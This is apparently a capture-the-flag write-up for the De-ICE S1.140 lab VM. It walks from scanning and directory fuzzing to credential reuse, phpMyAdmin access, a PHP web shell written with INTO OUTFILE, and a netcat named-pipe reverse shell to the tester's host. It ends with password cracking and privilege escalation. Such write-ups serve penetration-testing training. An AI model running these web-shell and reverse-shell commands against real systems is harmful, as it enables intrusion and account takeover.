published on in writeup
tags: de-ice

De-ICE S1.140

This is a walkthrough of how I completed the De-ICE S1.140 challenge. The final goal for this challenge is undocumented.

Nmap

[email protected]:~/de-ice/1.140# nmap -n -sV -A -p- 192.168.127.128

PORT    STATE  SERVICE  VERSION
21/tcp  open   ftp      ProFTPD 1.3.4a
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
22/tcp  open   ssh      OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:c6:66:05:29:a6:bd:a0:0b:1b:93:0a:0f:03:42:b0 (DSA)
|   2048 90:c1:ed:5e:f1:cb:6f:af:23:5b:c5:9f:98:03:27:71 (RSA)
|_  256 05:c2:e3:f5:7a:37:c4:95:62:2e:43:8b:df:26:33:1a (ECDSA)
80/tcp  open   http     Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
|_http-title: Lazy Admin Corp.
443/tcp open   ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
|_http-title: Lazy Admin Corp.
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-04-21T20:14:28+00:00
|_Not valid after:  2024-04-18T20:14:28+00:00
|_ssl-date: 2014-04-21T21:19:59+00:00; -3s from local time.
465/tcp closed smtps
993/tcp open   ssl/imap Dovecot imapd
|_imap-capabilities: more ID IMAP4rev1 post-login AUTH=PLAIN Pre-login capabilities listed SASL-IR OK ENABLE have AUTH=LOGINA0001 LOGIN-REFERRALS LITERAL+ IDLE
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-04-21T20:14:28+00:00
|_Not valid after:  2024-04-18T20:14:28+00:00
|_ssl-date: 2014-04-21T21:19:59+00:00; -3s from local time.
995/tcp open   ssl/pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING CAPA SASL(PLAIN LOGIN) USER UIDL TOP
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-04-21T20:14:28+00:00
|_Not valid after:  2024-04-18T20:14:28+00:00
|_ssl-date: 2014-04-21T21:19:59+00:00; -3s from local time.

Visiting both the HTTP and HTTPS pages greets us with the same page.

Wfuzz

I ran Wfuzz against both the HTTP and HTTPS services and got different results for each.

[email protected]:~/de-ice/1.140# wfuzz -c -zfile,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.127.128/FUZZ/

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: http://192.168.127.128/FUZZ/
Payload type: file,/usr/share/wfuzz/wordlist/general/common.txt
Total requests: 950

==================================================================
ID     Response   Lines      Word         Chars          Request   
==================================================================
00191:  C=403      8 L           22 W         210 Ch       " - cgi-bin"
00290:  C=403      8 L           22 W         206 Ch       " - doc"
00431:  C=403      8 L           22 W         208 Ch       " - icons"
00849:  C=200     97 L          525 W        7348 Ch       " - forum"


[email protected]:~/de-ice/1.140# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 https://192.168.127.128/FUZZ/

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: https://192.168.127.128/FUZZ/
Payload type: file,/usr/share/wfuzz/wordlist/general/common.txt
Total requests: 950

==================================================================
ID     Response   Lines      Word         Chars          Request   
==================================================================
00184:  C=403      8 L           22 W         210 Ch       " - cgi-bin"
00295:  C=403      8 L           22 W         206 Ch       " - doc"
00375:  C=200     97 L          525 W        7348 Ch       " - forum"
00424:  C=403      8 L           22 W         208 Ch       " - icons"
00624:  C=200    126 L          465 W        7540 Ch       " - phpmyadmin"
00913:  C=302      0 L            0 W           0 Ch       " - webmail"

LazyAdmin corp. Forums

I decided to have a look at the /forum/ directory found - as far as I could tell they were identical on both HTTP and HTTPS. There were several threads available to look through. The ‘Login Attacks’ thread contains a snippet from the SSH auth log, and contained a lot of usernames. I copied this information to a file, then used some command line magic to extract a list of users.

[email protected]:~/de-ice/1.140# grep "invalid user" auth.log | cut -d" " -f9,11 | grep -v "invalid" | sort -u

A very interesting line popped up, which distinctly resembled a password - the obvious implication is that somebody typed their password as their username by mistake. To find the possible corresponding user, I went back through the log to read the full line. The attempt came from 10.0.0.23, so I searched for other login attempts from the same IP - only one user came up: mbrown.

I attempted to login through SSH with these credentials, but they failed. It seems SSH to this server requires the publickey.

I was however able to log into the forum as mbrown. I had a look through the user profile area and found mbrown’s email address: [email protected]

SquirrelMail

With this information, I went straight back to the /webmail/ directory I found earlier and was able to log in as mbrown with the same credentials.

There were a handful of emails in the INBOX and Sent folders, which revealed the root passwords for MySQL and phpmyadmin. Knowing I had the URL for phpmyadmin also, I headed straight there!

phpMyAdmin

I had a look through the databases present, particularly for the forum and mail services. I was able to retrieve a handful of users and password hashes for each service. I used hash-identifier to identify the type of hashes these were. The mail hashes were reported to be MD5, but the forum hashes were not identified - presumably they are custom generated by the ‘my little forum’ application. I decided not press ahead with cracking the MD5 hashes before spending the time to investigate the other hashes.

I cracked two of the MD5 hashes with john.

[email protected]:~/de-ice/1.140# john --rules --format=raw-md5 --wordlist=/usr/share/wordlists/darkc0de.lst mail 
Austin-Willard   (sw @ lazyadmin.corp)
tum-ti-tum       (rh @ lazyadmin.corp)

I logged into the webmail of these two users, but found nothing further of interest.

PHP Code Execution

There was an opportunity to leverage the current access I had in phpmyadmin, to gain me a remote shell on the system. Since I was unable to get in through SSH, this seemed like a viable option.

Using the SQL query window, I ran the following:

SELECT " < ? system($_REQUEST['cmd']); ? > " INTO OUTFILE "/var/www/cmd.php"

This failed as the service didn’t didn’t have the privilege required to write directly into /var/www/. Instead, I looked for writable directories within the ‘my little forum’ directory. According to the installation requirements of this application, the templates_c directory should be writable. A quick test in the brower showed that I could indeed access this directory. I altered the SQL query as required, which successfully ran. I then visited my new file, and command execution was successful.

I thought I would try to use this code execution to obtain a netcat shell, though it seemed the version running on the remote host was not compiled to support the -e option. Instead, I used the named pipe technique to obtain an interactive shell.

http://192.168.127.128/forum/templates_c/cmd.php?cmd=mknod /var/www/forum/templates_c/backpipe p
https://192.168.127.128/forum/templates_c/cmd.php?cmd=/bin/bash 0 < /var/www/forum/templates_c/backpipe | nc 192.168.127.127 4444 1 > /var/www/forum/templates_c/backpipe
[email protected]:~/de-ice/1.140# nc -lnvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'

At this point I did some standard enumeration - users’ and their groups etc. It seems that swillard is the only user in the sudoers group, so would most likely be my final target. I also came across /opt/backup.sh, which had an interesting ACL set.

mbrown:x:1001:1001:Mark Brown
rhedley:x:1002:1002:Richard Hedley
swillard:x:1003:1003:Sandy Willard
mparker:x:1004:1004:Miles Parker
ftpuser:x:997:rhedley,mbrown,ftp
ftpadmin:x:999:rhedley,swillard
sshlogin:x:998:swillard,mbrown
sudo:x:27:swillard
[email protected]:/$ getfacl /opt/backup.sh
getfacl /opt/backup.sh
getfacl: Removing leading '/' from absolute path names
# file: opt/backup.sh
# owner: root
# group: root
user::rwx
group::rw-
group:ftpadmin:r--
mask::rw-
other::---

I already had some cracked email passwords for swillard and rhedley (two users in the ftpadmin group), so tried them with su.

The password for rhedley worked and I was able to read the backup.sh file. This contained an openssl command to create the encrypted backup file I retrieved via FTP earlier. I used this information to decrypt and extract the archive.

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
[email protected]:~/de-ice/1.140# openssl aes-256-cbc -d -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

More John

Within the archive was a backed up /etc/ directory, with a shadow file containing hashes for rhedley, mbrown and sraines. Raines is now Willard, so assuming her password wasn’t changed when her name was, cracking her password will give us access to a sudo-enabled account.

It took a long time for john to crack this one, as the SHA512 is slow to calculate.

[email protected]:~/de-ice/1.140# john --rules --wordlist=/usr/share/wordlists/darkc0de.lst etc/shadow
brillantissimo   (sraines)

Back to the Shell

From the rhedley account, which I was still logged in as, I tried to su to the swillard account with the newly cracked password.

Within the root folder was a file called secret.jpg, which I downloaded to my machine via netcat.

There didn’t appear to be any hidden messages either within the image or hex, so I assume this was the final flag.